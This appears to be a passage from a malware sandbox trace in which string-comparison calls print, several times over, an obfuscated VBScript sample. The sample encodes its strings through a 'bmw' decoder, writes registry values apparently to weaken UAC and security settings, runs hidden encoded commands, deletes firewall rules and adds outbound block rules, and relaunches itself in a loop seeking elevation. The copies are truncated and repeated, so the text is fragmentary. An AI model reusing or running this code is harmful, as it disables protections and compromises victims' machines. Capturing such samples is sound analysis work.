bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.337] wcsncmp (_String1="HFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59 [0226.337] wcsncmp (_String1="FEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.337] wcsncmp (_String1="EFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.337] wcsncmp (_String1="FBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = 